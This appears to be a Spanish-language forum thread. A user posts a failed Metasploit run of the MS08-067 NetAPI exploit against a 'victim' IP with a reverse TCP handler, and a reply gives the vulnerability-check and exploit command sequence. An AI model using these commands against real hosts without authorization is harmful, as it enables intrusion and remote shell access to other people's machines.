msf5 exploit(windows/smb/ms08_067_netapi) > set rhost XXX.XXX.XXX (ip victima)
rhost => 192.168.1.xxx
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost XXX.XXX.XXX (mi ip)
lhost => 192.168.1.xxx
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
- Started reverse TCP handler on 192.168.1.XXX:4444
- 192.168.1.XXX:445 - Automatically detecting the target...
- 192.168.1.XXX:445 - Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
- 192.168.1.XXX:445 - We could not detect the language pack, defaulting to English
[-] 192.168.1.XXX:445 - Exploit aborted due to failure: no-target: No matching target
- Exploit completed, but no session was created. <<<<< porque????
msf5 exploit(windows/smb/ms08_067_netapi) >
que estoy haciendo mal?
Ni siquiera especificas que version estas atacando..
windows/smb/ms08_067_netapi explota una falla en la interpretación de la ruta del código de canonización de NetAPI32.dll a través del servicio Server.
Claramente te esta diciendo que no esta haciendo match con el objetivo, asi que valla uno a saber si la colocaste correctamente pero vamos a suponer que si.
Has un escaneo para verificar si es vulnerable..
> search ms08_067_check
> use auxiliary/scanner/smb/ms08_067_check
> show options
> set RHOSTS 192.168.x.x
> run
#Luego se vuleve a proceder:
> search ms08_067_netapi
> use exploit/windows/smb/ms08_067_netapi
> show options
> set RHOST 192.168.x.x
>set PAYLOAD xx/xx/xx
>exploit
Es teoria eso deberia bastar, pero Igual con la pobre información que proporcionas no hay mucho que decir...